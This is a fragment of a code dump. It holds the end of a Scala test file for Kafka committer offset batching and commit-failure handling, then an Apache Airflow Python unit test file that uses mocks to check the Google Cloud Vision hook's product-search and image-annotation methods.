val batch = probe
.expectNextN(6)
.map(_.committableOffset)
.foldLeft(CommittableOffsetBatch.empty)(_.updated(_))
batch.tellCommit()
awaitAssert {
commitLog.calls should have size (1)
}
val commitMap = commitLog.calls.head._1
commitMap(new TopicPartition("topic1", 1)).offset should ===(msgsTopic1.last.record.offset() + 1)
commitMap(new TopicPartition("topic2", 1)).offset should ===(msgsTopic2.last.record.offset() + 1)
commitMap(new TopicPartition("topic1", 1)).metadata() should ===(msgsTopic1.last.record.offset().toString)
commitMap(new TopicPartition("topic2", 1)).metadata() should ===(msgsTopic2.last.record.offset().toString)
//emulate commit
commitLog.calls.foreach {
case (offsets, callback) => callback.onComplete(offsets.asJava, null)
}
Await.result(control.shutdown(), remainingOrDefault)
}
"Committer.flow" should "fail in case of an exception during commit" in assertAllStagesStopped {
val committerSettings = CommitterSettings(system)
.withMaxBatch(1L)
val commitLog = new internal.ConsumerMock.LogHandler()
val mock = new ConsumerMock[K, V](commitLog)
val msg = createMessage(1)
mock.enqueue(List(toRecord(msg)))
val (control, probe) = createCommittableSource(mock.mock)
.map(_.committableOffset)
.toMat(Committer.sink(committerSettings))(Keep.both)
.run()
awaitAssert {
commitLog.calls should have size 1
}
emulateFailedCommit(commitLog)
probe.failed.futureValue shouldBe a[CommitFailedException]
control.shutdown().futureValue shouldBe Done
}
it should "recover with supervision in case of commit fail" in assertAllStagesStopped {
val committerSettings = CommitterSettings(system)
.withMaxBatch(1L)
val commitLog = new ConsumerMock.LogHandler()
val mock = new ConsumerMock[K, V](commitLog)
val msg = createMessage(1)
mock.enqueue(List(toRecord(msg)))
val resumeOnCommitFailed: Supervision.Decider = {
case _: CommitFailedException => Supervision.Resume
case _ => Supervision.Stop
}
val (control, probe) = createCommittableSource(mock.mock)
.map(_.committableOffset)
.toMat(
Committer
.sink(committerSettings)
.withAttributes(ActorAttributes.supervisionStrategy(resumeOnCommitFailed))
)(Keep.both)
.run()
awaitAssert {
commitLog.calls should have size 1
}
emulateFailedCommit(commitLog)
control.shutdown().futureValue shouldBe Done
probe.futureValue shouldBe Done
}
private def emulateFailedCommit(commitLog: ConsumerMock.LogHandler): Unit = {
val failure = new CommitFailedException()
commitLog.calls.head match {
case (_, callback) => callback.onComplete(null, failure)
}
}
}
| softwaremill/reactive-kafka | tests/src/test/scala/akka/kafka/internal/CommittingWithMockSpec.scala | Scala | apache-2.0 | 19,063 |
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import unittest
from unittest import mock
import pytest
from google.cloud.vision import enums
from google.cloud.vision_v1 import ProductSearchClient
from google.cloud.vision_v1.proto.image_annotator_pb2 import (
AnnotateImageResponse,
EntityAnnotation,
SafeSearchAnnotation,
)
from google.cloud.vision_v1.proto.product_search_service_pb2 import Product, ProductSet, ReferenceImage
from google.protobuf.json_format import MessageToDict
from parameterized import parameterized
from airflow.exceptions import AirflowException
from airflow.providers.google.cloud.hooks.vision import ERR_DIFF_NAMES, ERR_UNABLE_TO_CREATE, CloudVisionHook
from tests.providers.google.cloud.utils.base_gcp_mock import mock_base_gcp_hook_default_project_id
PROJECT_ID_TEST = 'project-id'
PROJECT_ID_TEST_2 = 'project-id-2'
LOC_ID_TEST = 'loc-id'
LOC_ID_TEST_2 = 'loc-id-2'
PRODUCTSET_ID_TEST = 'ps-id'
PRODUCTSET_ID_TEST_2 = 'ps-id-2'
PRODUCTSET_NAME_TEST = f'projects/{PROJECT_ID_TEST}/locations/{LOC_ID_TEST}/productSets/{PRODUCTSET_ID_TEST}'
PRODUCT_ID_TEST = 'p-id'
PRODUCT_ID_TEST_2 = 'p-id-2'
PRODUCT_NAME_TEST = f"projects/{PROJECT_ID_TEST}/locations/{LOC_ID_TEST}/products/{PRODUCT_ID_TEST}"
PRODUCT_NAME = f"projects/{PROJECT_ID_TEST}/locations/{LOC_ID_TEST}/products/{PRODUCT_ID_TEST}"
REFERENCE_IMAGE_ID_TEST = 'ri-id'
REFERENCE_IMAGE_GEN_ID_TEST = 'ri-id'
ANNOTATE_IMAGE_REQUEST = {
'image': {'source': {'image_uri': "gs://bucket-name/object-name"}},
'features': [{'type': enums.Feature.Type.LOGO_DETECTION}],
}
BATCH_ANNOTATE_IMAGE_REQUEST = [
{
'image': {'source': {'image_uri': "gs://bucket-name/object-name"}},
'features': [{'type': enums.Feature.Type.LOGO_DETECTION}],
},
{
'image': {'source': {'image_uri': "gs://bucket-name/object-name"}},
'features': [{'type': enums.Feature.Type.LOGO_DETECTION}],
},
]
REFERENCE_IMAGE_NAME_TEST = (
f"projects/{PROJECT_ID_TEST}/locations/{LOC_ID_TEST}/products/"
f"{PRODUCTSET_ID_TEST}/referenceImages/{REFERENCE_IMAGE_ID_TEST}"
)
REFERENCE_IMAGE_TEST = ReferenceImage(name=REFERENCE_IMAGE_GEN_ID_TEST)
REFERENCE_IMAGE_WITHOUT_ID_NAME = ReferenceImage()
DETECT_TEST_IMAGE = {"source": {"image_uri": "https://foo.com/image.jpg"}}
DETECT_TEST_ADDITIONAL_PROPERTIES = {"test-property-1": "test-value-1", "test-property-2": "test-value-2"}
class TestGcpVisionHook(unittest.TestCase):
def setUp(self):
with mock.patch(
'airflow.providers.google.cloud.hooks.vision.CloudVisionHook.__init__',
new=mock_base_gcp_hook_default_project_id,
):
self.hook = CloudVisionHook(gcp_conn_id='test')
@mock.patch(
"airflow.providers.google.cloud.hooks.vision.CloudVisionHook.client_info",
new_callable=mock.PropertyMock,
)
@mock.patch("airflow.providers.google.cloud.hooks.vision.CloudVisionHook._get_credentials")
@mock.patch("airflow.providers.google.cloud.hooks.vision.ProductSearchClient")
def test_product_search_client_creation(self, mock_client, mock_get_creds, mock_client_info):
result = self.hook.get_conn()
mock_client.assert_called_once_with(
credentials=mock_get_creds.return_value, client_info=mock_client_info.return_value
)
assert mock_client.return_value == result
assert self.hook._client == result
@mock.patch('airflow.providers.google.cloud.hooks.vision.CloudVisionHook.get_conn')
def test_create_productset_explicit_id(self, get_conn):
# Given
create_product_set_method = get_conn.return_value.create_product_set
create_product_set_method.return_value = None
parent = ProductSearchClient.location_path(PROJECT_ID_TEST, LOC_ID_TEST)
product_set = ProductSet()
# When
result = self.hook.create_product_set(
location=LOC_ID_TEST,
product_set_id=PRODUCTSET_ID_TEST,
product_set=product_set,
project_id=PROJECT_ID_TEST,
retry=None,
timeout=None,
metadata=None,
)
# Then
# ProductSet ID was provided explicitly in the method call above, should be returned from the method
assert result == PRODUCTSET_ID_TEST
create_product_set_method.assert_called_once_with(
parent=parent,
product_set=product_set,
product_set_id=PRODUCTSET_ID_TEST,
retry=None,
timeout=None,
metadata=None,
)
@mock.patch('airflow.providers.google.cloud.hooks.vision.CloudVisionHook.get_conn')
def test_create_productset_autogenerated_id(self, get_conn):
# Given
autogenerated_id = 'autogen-id'
response_product_set = ProductSet(
name=ProductSearchClient.product_set_path(PROJECT_ID_TEST, LOC_ID_TEST, autogenerated_id)
)
create_product_set_method = get_conn.return_value.create_product_set
create_product_set_method.return_value = response_product_set
parent = ProductSearchClient.location_path(PROJECT_ID_TEST, LOC_ID_TEST)
product_set = ProductSet()
# When
result = self.hook.create_product_set(
location=LOC_ID_TEST, product_set_id=None, product_set=product_set, project_id=PROJECT_ID_TEST
)
# Then
# ProductSet ID was not provided in the method call above. Should be extracted from the API response
# and returned.
assert result == autogenerated_id
create_product_set_method.assert_called_once_with(
parent=parent,
product_set=product_set,
product_set_id=None,
retry=None,
timeout=None,
metadata=None,
)
@mock.patch('airflow.providers.google.cloud.hooks.vision.CloudVisionHook.get_conn')
def test_create_productset_autogenerated_id_wrong_api_response(self, get_conn):
# Given
response_product_set = None
create_product_set_method = get_conn.return_value.create_product_set
create_product_set_method.return_value = response_product_set
parent = ProductSearchClient.location_path(PROJECT_ID_TEST, LOC_ID_TEST)
product_set = ProductSet()
# When
with pytest.raises(AirflowException) as ctx:
self.hook.create_product_set(
location=LOC_ID_TEST,
product_set_id=None,
product_set=product_set,
project_id=PROJECT_ID_TEST,
retry=None,
timeout=None,
metadata=None,
)
# Then
# API response was wrong (None) and thus ProductSet ID extraction should fail.
err = ctx.value
assert 'Unable to get name from response...' in str(err)
create_product_set_method.assert_called_once_with(
parent=parent,
product_set=product_set,
product_set_id=None,
retry=None,
timeout=None,
metadata=None,
)
@mock.patch('airflow.providers.google.cloud.hooks.vision.CloudVisionHook.get_conn')
def test_get_productset(self, get_conn):
# Given
name = ProductSearchClient.product_set_path(PROJECT_ID_TEST, LOC_ID_TEST, PRODUCTSET_ID_TEST)
response_product_set = ProductSet(name=name)
get_product_set_method = get_conn.return_value.get_product_set
get_product_set_method.return_value = response_product_set
# When
response = self.hook.get_product_set(
location=LOC_ID_TEST, product_set_id=PRODUCTSET_ID_TEST, project_id=PROJECT_ID_TEST
)
# Then
assert response
assert response == MessageToDict(response_product_set)
get_product_set_method.assert_called_once_with(name=name, retry=None, timeout=None, metadata=None)
@mock.patch('airflow.providers.google.cloud.hooks.vision.CloudVisionHook.get_conn')
def test_update_productset_no_explicit_name(self, get_conn):
# Given
product_set = ProductSet()
update_product_set_method = get_conn.return_value.update_product_set
update_product_set_method.return_value = product_set
productset_name = ProductSearchClient.product_set_path(
PROJECT_ID_TEST, LOC_ID_TEST, PRODUCTSET_ID_TEST
)
# When
result = self.hook.update_product_set(
location=LOC_ID_TEST,
product_set_id=PRODUCTSET_ID_TEST,
product_set=product_set,
update_mask=None,
project_id=PROJECT_ID_TEST,
retry=None,
timeout=None,
metadata=None,
)
# Then
assert result == MessageToDict(product_set)
update_product_set_method.assert_called_once_with(
product_set=ProductSet(name=productset_name),
metadata=None,
retry=None,
timeout=None,
update_mask=None,
)
@parameterized.expand([(None, None), (None, PRODUCTSET_ID_TEST), (LOC_ID_TEST, None)])
@mock.patch('airflow.providers.google.cloud.hooks.vision.CloudVisionHook.get_conn')
def test_update_productset_no_explicit_name_and_missing_params_for_constructed_name(
self, location, product_set_id, get_conn
):
# Given
update_product_set_method = get_conn.return_value.update_product_set
update_product_set_method.return_value = None
product_set = ProductSet()
# When
with pytest.raises(AirflowException) as ctx:
self.hook.update_product_set(
location=location,
product_set_id=product_set_id,
product_set=product_set,
update_mask=None,
project_id=PROJECT_ID_TEST,
retry=None,
timeout=None,
metadata=None,
)
err = ctx.value
assert err
assert ERR_UNABLE_TO_CREATE.format(label='ProductSet', id_label='productset_id') in str(err)
update_product_set_method.assert_not_called()
@parameterized.expand([(None, None), (None, PRODUCTSET_ID_TEST), (LOC_ID_TEST, None)])
@mock.patch('airflow.providers.google.cloud.hooks.vision.CloudVisionHook.get_conn')
def test_update_productset_explicit_name_missing_params_for_constructed_name(
self, location, product_set_id, get_conn
):
# Given
explicit_ps_name = ProductSearchClient.product_set_path(
PROJECT_ID_TEST_2, LOC_ID_TEST_2, PRODUCTSET_ID_TEST_2
)
product_set = ProductSet(name=explicit_ps_name)
update_product_set_method = get_conn.return_value.update_product_set
update_product_set_method.return_value = product_set
# When
result = self.hook.update_product_set(
location=location,
product_set_id=product_set_id,
product_set=product_set,
update_mask=None,
project_id=PROJECT_ID_TEST,
retry=None,
timeout=None,
metadata=None,
)
# Then
assert result == MessageToDict(product_set)
update_product_set_method.assert_called_once_with(
product_set=ProductSet(name=explicit_ps_name),
metadata=None,
retry=None,
timeout=None,
update_mask=None,
)
@mock.patch('airflow.providers.google.cloud.hooks.vision.CloudVisionHook.get_conn')
def test_update_productset_explicit_name_different_from_constructed(self, get_conn):
# Given
update_product_set_method = get_conn.return_value.update_product_set
update_product_set_method.return_value = None
explicit_ps_name = ProductSearchClient.product_set_path(
PROJECT_ID_TEST_2, LOC_ID_TEST_2, PRODUCTSET_ID_TEST_2
)
product_set = ProductSet(name=explicit_ps_name)
template_ps_name = ProductSearchClient.product_set_path(
PROJECT_ID_TEST, LOC_ID_TEST, PRODUCTSET_ID_TEST
)
# When
# Location and product_set_id are passed in addition to a ProductSet with an explicit name,
# but both names differ (constructed != explicit).
# Should throw AirflowException in this case.
with pytest.raises(AirflowException) as ctx:
self.hook.update_product_set(
location=LOC_ID_TEST,
product_set_id=PRODUCTSET_ID_TEST,
product_set=product_set,
update_mask=None,
project_id=PROJECT_ID_TEST,
retry=None,
timeout=None,
metadata=None,
)
err = ctx.value
# self.assertIn("The required parameter 'project_id' is missing", str(err))
assert err
assert (
ERR_DIFF_NAMES.format(
explicit_name=explicit_ps_name,
constructed_name=template_ps_name,
label="ProductSet",
id_label="productset_id",
)
in str(err)
)
update_product_set_method.assert_not_called()
@mock.patch('airflow.providers.google.cloud.hooks.vision.CloudVisionHook.get_conn')
def test_delete_productset(self, get_conn):
# Given
delete_product_set_method = get_conn.return_value.delete_product_set
delete_product_set_method.return_value = None
name = ProductSearchClient.product_set_path(PROJECT_ID_TEST, LOC_ID_TEST, PRODUCTSET_ID_TEST)
# When
response = self.hook.delete_product_set(
location=LOC_ID_TEST, product_set_id=PRODUCTSET_ID_TEST, project_id=PROJECT_ID_TEST
)
# Then
assert response is None
delete_product_set_method.assert_called_once_with(name=name, retry=None, timeout=None, metadata=None)
@mock.patch(
'airflow.providers.google.cloud.hooks.vision.CloudVisionHook.get_conn',
**{'return_value.create_reference_image.return_value': REFERENCE_IMAGE_TEST},
)
def test_create_reference_image_explicit_id(self, get_conn):
# Given
create_reference_image_method = get_conn.return_value.create_reference_image
# When
result = self.hook.create_reference_image(
project_id=PROJECT_ID_TEST,
location=LOC_ID_TEST,
product_id=PRODUCT_ID_TEST,
reference_image=REFERENCE_IMAGE_WITHOUT_ID_NAME,
reference_image_id=REFERENCE_IMAGE_ID_TEST,
)
# Then
# Product ID was provided explicitly in the method call above, should be returned from the method
assert result == REFERENCE_IMAGE_ID_TEST
create_reference_image_method.assert_called_once_with(
parent=PRODUCT_NAME,
reference_image=REFERENCE_IMAGE_WITHOUT_ID_NAME,
reference_image_id=REFERENCE_IMAGE_ID_TEST,
retry=None,
timeout=None,
metadata=None,
)
@mock.patch(
'airflow.providers.google.cloud.hooks.vision.CloudVisionHook.get_conn',
**{'return_value.create_reference_image.return_value': REFERENCE_IMAGE_TEST},
)
def test_create_reference_image_autogenerated_id(self, get_conn):
# Given
create_reference_image_method = get_conn.return_value.create_reference_image
# When
result = self.hook.create_reference_image(
project_id=PROJECT_ID_TEST,
location=LOC_ID_TEST,
product_id=PRODUCT_ID_TEST,
reference_image=REFERENCE_IMAGE_TEST,
reference_image_id=REFERENCE_IMAGE_ID_TEST,
)
# Then
# Product ID was provided explicitly in the method call above, should be returned from the method
assert result == REFERENCE_IMAGE_GEN_ID_TEST
create_reference_image_method.assert_called_once_with(
parent=PRODUCT_NAME,
reference_image=REFERENCE_IMAGE_TEST,
reference_image_id=REFERENCE_IMAGE_ID_TEST,
retry=None,
timeout=None,
metadata=None,
)
@mock.patch('airflow.providers.google.cloud.hooks.vision.CloudVisionHook.get_conn')
def test_add_product_to_product_set(self, get_conn):
# Given
add_product_to_product_set_method = get_conn.return_value.add_product_to_product_set
# When
self.hook.add_product_to_product_set(
product_set_id=PRODUCTSET_ID_TEST,
product_id=PRODUCT_ID_TEST,
location=LOC_ID_TEST,
project_id=PROJECT_ID_TEST,
)
# Then
# Product ID was provided explicitly in the method call above, should be returned from the method
add_product_to_product_set_method.assert_called_once_with(
name=PRODUCTSET_NAME_TEST, product=PRODUCT_NAME_TEST, retry=None, timeout=None, metadata=None
)
# remove_product_from_product_set
@mock.patch('airflow.providers.google.cloud.hooks.vision.CloudVisionHook.get_conn')
def test_remove_product_from_product_set(self, get_conn):
# Given
remove_product_from_product_set_method = get_conn.return_value.remove_product_from_product_set
# When
self.hook.remove_product_from_product_set(
product_set_id=PRODUCTSET_ID_TEST,
product_id=PRODUCT_ID_TEST,
location=LOC_ID_TEST,
project_id=PROJECT_ID_TEST,
)
# Then
# Product ID was provided explicitly in the method call above, should be returned from the method
remove_product_from_product_set_method.assert_called_once_with(
name=PRODUCTSET_NAME_TEST, product=PRODUCT_NAME_TEST, retry=None, timeout=None, metadata=None
)
@mock.patch('airflow.providers.google.cloud.hooks.vision.CloudVisionHook.annotator_client')
def test_annotate_image(self, annotator_client_mock):
# Given
annotate_image_method = annotator_client_mock.annotate_image
# When
self.hook.annotate_image(request=ANNOTATE_IMAGE_REQUEST)
# Then
# Product ID was provided explicitly in the method call above, should be returned from the method
annotate_image_method.assert_called_once_with(
request=ANNOTATE_IMAGE_REQUEST, retry=None, timeout=None
)
@mock.patch('airflow.providers.google.cloud.hooks.vision.CloudVisionHook.annotator_client')
def test_batch_annotate_images(self, annotator_client_mock):
# Given
batch_annotate_images_method = annotator_client_mock.batch_annotate_images
# When
self.hook.batch_annotate_images(requests=BATCH_ANNOTATE_IMAGE_REQUEST)
# Then
# Product ID was provided explicitly in the method call above, should be returned from the method
batch_annotate_images_method.assert_called_once_with(
requests=BATCH_ANNOTATE_IMAGE_REQUEST, retry=None, timeout=None
)
@mock.patch('airflow.providers.google.cloud.hooks.vision.CloudVisionHook.get_conn')
def test_create_product_explicit_id(self, get_conn):
# Given
create_product_method = get_conn.return_value.create_product
create_product_method.return_value = None
parent = ProductSearchClient.location_path(PROJECT_ID_TEST, LOC_ID_TEST)
product = Product()
# When
result = self.hook.create_product(
location=LOC_ID_TEST, product_id=PRODUCT_ID_TEST, product=product, project_id=PROJECT_ID_TEST
)
# Then
# Product ID was provided explicitly in the method call above, should be returned from the method
assert result == PRODUCT_ID_TEST
create_product_method.assert_called_once_with(
parent=parent,
product=product,
product_id=PRODUCT_ID_TEST,
retry=None,
timeout=None,
metadata=None,
)
@mock.patch('airflow.providers.google.cloud.hooks.vision.CloudVisionHook.get_conn')
def test_create_product_autogenerated_id(self, get_conn):
# Given
autogenerated_id = 'autogen-p-id'
response_product = Product(
name=ProductSearchClient.product_path(PROJECT_ID_TEST, LOC_ID_TEST, autogenerated_id)
)
create_product_method = get_conn.return_value.create_product
create_product_method.return_value = response_product
parent = ProductSearchClient.location_path(PROJECT_ID_TEST, LOC_ID_TEST)
product = Product()
# When
result = self.hook.create_product(
location=LOC_ID_TEST, product_id=None, product=product, project_id=PROJECT_ID_TEST
)
# Then
# Product ID was not provided in the method call above. Should be extracted from the API response
# and returned.
assert result == autogenerated_id
create_product_method.assert_called_once_with(
parent=parent, product=product, product_id=None, retry=None, timeout=None, metadata=None
)
@mock.patch('airflow.providers.google.cloud.hooks.vision.CloudVisionHook.get_conn')
def test_create_product_autogenerated_id_wrong_name_in_response(self, get_conn):
# Given
wrong_name = 'wrong_name_not_a_correct_path'
response_product = Product(name=wrong_name)
create_product_method = get_conn.return_value.create_product
create_product_method.return_value = response_product
parent = ProductSearchClient.location_path(PROJECT_ID_TEST, LOC_ID_TEST)
product = Product()
# When
with pytest.raises(AirflowException) as ctx:
self.hook.create_product(
location=LOC_ID_TEST, product_id=None, product=product, project_id=PROJECT_ID_TEST
)
# Then
# API response was wrong (wrong name format) and thus ProductSet ID extraction should fail.
err = ctx.value
assert 'Unable to get id from name' in str(err)
create_product_method.assert_called_once_with(
parent=parent, product=product, product_id=None, retry=None, timeout=None, metadata=None
)
@mock.patch('airflow.providers.google.cloud.hooks.vision.CloudVisionHook.get_conn')
def test_create_product_autogenerated_id_wrong_api_response(self, get_conn):
# Given
response_product = None
create_product_method = get_conn.return_value.create_product
create_product_method.return_value = response_product
parent = ProductSearchClient.location_path(PROJECT_ID_TEST, LOC_ID_TEST)
product = Product()
# When
with pytest.raises(AirflowException) as ctx:
self.hook.create_product(
location=LOC_ID_TEST, product_id=None, product=product, project_id=PROJECT_ID_TEST
)
# Then
# API response was wrong (None) and thus ProductSet ID extraction should fail.
err = ctx.value
assert 'Unable to get name from response...' in str(err)
create_product_method.assert_called_once_with(
parent=parent, product=product, product_id=None, retry=None, timeout=None, metadata=None
)
@mock.patch('airflow.providers.google.cloud.hooks.vision.CloudVisionHook.get_conn')
def test_update_product_no_explicit_name(self, get_conn):
# Given
product = Product()
update_product_method = get_conn.return_value.update_product
update_product_method.return_value = product
product_name = ProductSearchClient.product_path(PROJECT_ID_TEST, LOC_ID_TEST, PRODUCT_ID_TEST)
# When
result = self.hook.update_product(
location=LOC_ID_TEST,
product_id=PRODUCT_ID_TEST,
product=product,
update_mask=None,
project_id=PROJECT_ID_TEST,
retry=None,
timeout=None,
metadata=None,
)
# Then
assert result == MessageToDict(product)
update_product_method.assert_called_once_with(
product=Product(name=product_name), metadata=None, retry=None, timeout=None, update_mask=None
)
@parameterized.expand([(None, None), (None, PRODUCT_ID_TEST), (LOC_ID_TEST, None)])
@mock.patch('airflow.providers.google.cloud.hooks.vision.CloudVisionHook.get_conn')
def test_update_product_no_explicit_name_and_missing_params_for_constructed_name(
self, location, product_id, get_conn
):
# Given
update_product_method = get_conn.return_value.update_product
update_product_method.return_value = None
product = Product()
# When
with pytest.raises(AirflowException) as ctx:
self.hook.update_product(
location=location,
product_id=product_id,
product=product,
update_mask=None,
project_id=PROJECT_ID_TEST,
retry=None,
timeout=None,
metadata=None,
)
err = ctx.value
assert err
assert ERR_UNABLE_TO_CREATE.format(label='Product', id_label='product_id') in str(err)
update_product_method.assert_not_called()
@parameterized.expand([(None, None), (None, PRODUCT_ID_TEST), (LOC_ID_TEST, None)])
@mock.patch('airflow.providers.google.cloud.hooks.vision.CloudVisionHook.get_conn')
def test_update_product_explicit_name_missing_params_for_constructed_name(
self, location, product_id, get_conn
):
# Given
explicit_p_name = ProductSearchClient.product_path(
PROJECT_ID_TEST_2, LOC_ID_TEST_2, PRODUCT_ID_TEST_2
)
product = Product(name=explicit_p_name)
update_product_method = get_conn.return_value.update_product
update_product_method.return_value = product
# When
result = self.hook.update_product(
location=location,
product_id=product_id,
product=product,
update_mask=None,
project_id=PROJECT_ID_TEST,
retry=None,
timeout=None,
metadata=None,
)
# Then
assert result == MessageToDict(product)
update_product_method.assert_called_once_with(
product=Product(name=explicit_p_name), metadata=None, retry=None, timeout=None, update_mask=None
)
@mock.patch('airflow.providers.google.cloud.hooks.vision.CloudVisionHook.get_conn')
def test_update_product_explicit_name_different_from_constructed(self, get_conn):
# Given
update_product_method = get_conn.return_value.update_product
update_product_method.return_value = None
explicit_p_name = ProductSearchClient.product_path(
PROJECT_ID_TEST_2, LOC_ID_TEST_2, PRODUCT_ID_TEST_2
)
product = Product(name=explicit_p_name)
template_p_name = ProductSearchClient.product_path(PROJECT_ID_TEST, LOC_ID_TEST, PRODUCT_ID_TEST)
# When
# Location and product_id are passed in addition to a Product with an explicit name,
# but both names differ (constructed != explicit).
# Should throw AirflowException in this case.
with pytest.raises(AirflowException) as ctx:
self.hook.update_product(
location=LOC_ID_TEST,
product_id=PRODUCT_ID_TEST,
product=product,
update_mask=None,
project_id=PROJECT_ID_TEST,
retry=None,
timeout=None,
metadata=None,
)
err = ctx.value
assert err
assert (
ERR_DIFF_NAMES.format(
explicit_name=explicit_p_name,
constructed_name=template_p_name,
label="Product",
id_label="product_id",
)
in str(err)
)
update_product_method.assert_not_called()
@mock.patch('airflow.providers.google.cloud.hooks.vision.CloudVisionHook.get_conn')
def test_delete_product(self, get_conn):
# Given
delete_product_method = get_conn.return_value.delete_product
delete_product_method.return_value = None
name = ProductSearchClient.product_path(PROJECT_ID_TEST, LOC_ID_TEST, PRODUCT_ID_TEST)
# When
response = self.hook.delete_product(
location=LOC_ID_TEST, product_id=PRODUCT_ID_TEST, project_id=PROJECT_ID_TEST
)
# Then
assert response is None
delete_product_method.assert_called_once_with(name=name, retry=None, timeout=None, metadata=None)
@mock.patch("airflow.providers.google.cloud.hooks.vision.CloudVisionHook.annotator_client")
def test_detect_text(self, annotator_client_mock):
# Given
detect_text_method = annotator_client_mock.text_detection
detect_text_method.return_value = AnnotateImageResponse(
text_annotations=[EntityAnnotation(description="test", score=0.5)]
)
# When
self.hook.text_detection(image=DETECT_TEST_IMAGE)
# Then
detect_text_method.assert_called_once_with(
image=DETECT_TEST_IMAGE, max_results=None, retry=None, timeout=None
)
@mock.patch("airflow.providers.google.cloud.hooks.vision.CloudVisionHook.annotator_client")
def test_detect_text_with_additional_properties(self, annotator_client_mock):
# Given
detect_text_method = annotator_client_mock.text_detection
detect_text_method.return_value = AnnotateImageResponse(
text_annotations=[EntityAnnotation(description="test", score=0.5)]
)
# When
self.hook.text_detection(
image=DETECT_TEST_IMAGE, additional_properties={"prop1": "test1", "prop2": "test2"}
)
# Then
detect_text_method.assert_called_once_with(
image=DETECT_TEST_IMAGE, max_results=None, retry=None, timeout=None, prop1="test1", prop2="test2"
)
@mock.patch("airflow.providers.google.cloud.hooks.vision.CloudVisionHook.annotator_client")
def test_detect_text_with_error_response(self, annotator_client_mock):
# Given
detect_text_method = annotator_client_mock.text_detection
detect_text_method.return_value = AnnotateImageResponse(
error={"code": 3, "message": "test error message"}
)
# When
with pytest.raises(AirflowException) as ctx:
self.hook.text_detection(image=DETECT_TEST_IMAGE)
err = ctx.value
assert "test error message" in str(err)
@mock.patch("airflow.providers.google.cloud.hooks.vision.CloudVisionHook.annotator_client")
def test_document_text_detection(self, annotator_client_mock):
# Given
document_text_detection_method = annotator_client_mock.document_text_detection
document_text_detection_method.return_value = AnnotateImageResponse(
text_annotations=[EntityAnnotation(description="test", score=0.5)]
)
# When
self.hook.document_text_detection(image=DETECT_TEST_IMAGE)
# Then
document_text_detection_method.assert_called_once_with(
image=DETECT_TEST_IMAGE, max_results=None, retry=None, timeout=None
)
@mock.patch("airflow.providers.google.cloud.hooks.vision.CloudVisionHook.annotator_client")
def test_document_text_detection_with_additional_properties(self, annotator_client_mock):
# Given
document_text_detection_method = annotator_client_mock.document_text_detection
document_text_detection_method.return_value = AnnotateImageResponse(
text_annotations=[EntityAnnotation(description="test", score=0.5)]
)
# When
self.hook.document_text_detection(
image=DETECT_TEST_IMAGE, additional_properties={"prop1": "test1", "prop2": "test2"}
)
# Then
document_text_detection_method.assert_called_once_with(
image=DETECT_TEST_IMAGE, max_results=None, retry=None, timeout=None, prop1="test1", prop2="test2"
)
@mock.patch("airflow.providers.google.cloud.hooks.vision.CloudVisionHook.annotator_client")
def test_detect_document_text_with_error_response(self, annotator_client_mock):
# Given
detect_text_method = annotator_client_mock.document_text_detection
detect_text_method.return_value = AnnotateImageResponse(
error={"code": 3, "message": "test error message"}
)
# When
with pytest.raises(AirflowException) as ctx:
self.hook.document_text_detection(image=DETECT_TEST_IMAGE)
err = ctx.value
assert "test error message" in str(err)
@mock.patch("airflow.providers.google.cloud.hooks.vision.CloudVisionHook.annotator_client")
def test_label_detection(self, annotator_client_mock):
# Given
label_detection_method = annotator_client_mock.label_detection
label_detection_method.return_value = AnnotateImageResponse(
label_annotations=[EntityAnnotation(description="test", score=0.5)]
)
# When
self.hook.label_detection(image=DETECT_TEST_IMAGE)
# Then
label_detection_method.assert_called_once_with(
image=DETECT_TEST_IMAGE, max_results=None, retry=None, timeout=None
)
@mock.patch("airflow.providers.google.cloud.hooks.vision.CloudVisionHook.annotator_client")
def test_label_detection_with_additional_properties(self, annotator_client_mock):
# Given
label_detection_method = annotator_client_mock.label_detection
label_detection_method.return_value = AnnotateImageResponse(
label_annotations=[EntityAnnotation(description="test", score=0.5)]
)
# When
self.hook.label_detection(
image=DETECT_TEST_IMAGE, additional_properties={"prop1": "test1", "prop2": "test2"}
)
# Then
label_detection_method.assert_called_once_with(
image=DETECT_TEST_IMAGE, max_results=None, retry=None, timeout=None, prop1="test1", prop2="test2"
)
@mock.patch("airflow.providers.google.cloud.hooks.vision.CloudVisionHook.annotator_client")
def test_label_detection_with_error_response(self, annotator_client_mock):
# Given
detect_text_method = annotator_client_mock.label_detection
detect_text_method.return_value = AnnotateImageResponse(
error={"code": 3, "message": "test error message"}
)
# When
with pytest.raises(AirflowException) as ctx:
self.hook.label_detection(image=DETECT_TEST_IMAGE)
err = ctx.value
assert "test error message" in str(err)
@mock.patch("airflow.providers.google.cloud.hooks.vision.CloudVisionHook.annotator_client")
def test_safe_search_detection(self, annotator_client_mock):
# Given
safe_search_detection_method = annotator_client_mock.safe_search_detection
safe_search_detection_method.return_value = AnnotateImageResponse(
safe_search_annotation=SafeSearchAnnotation(
adult="VERY_UNLIKELY",
spoof="VERY_UNLIKELY",
medical="VERY_UNLIKELY",
violence="VERY_UNLIKELY",
racy="VERY_UNLIKELY",
)
)
# When
self.hook.safe_search_detection(image=DETECT_TEST_IMAGE)
# Then
safe_search_detection_method.assert_called_once_with(
image=DETECT_TEST_IMAGE, max_results=None, retry=None, timeout=None
)
@mock.patch("airflow.providers.google.cloud.hooks.vision.CloudVisionHook.annotator_client")
def test_safe_search_detection_with_additional_properties(self, annotator_client_mock):
# Given
safe_search_detection_method = annotator_client_mock.safe_search_detection
safe_search_detection_method.return_value = AnnotateImageResponse(
safe_search_annotation=SafeSearchAnnotation(
adult="VERY_UNLIKELY",
spoof="VERY_UNLIKELY",
medical="VERY_UNLIKELY",
violence="VERY_UNLIKELY",
racy="VERY_UNLIKELY",
)
)
# When
self.hook.safe_search_detection(
image=DETECT_TEST_IMAGE, additional_properties={"prop1": "test1", "prop2": "test2"}
)
# Then
safe_search_detection_method.assert_called_once_with(
image=DETECT_TEST_IMAGE, max_results=None, retry=None, timeout=None, prop1="test1", prop2="test2"
)
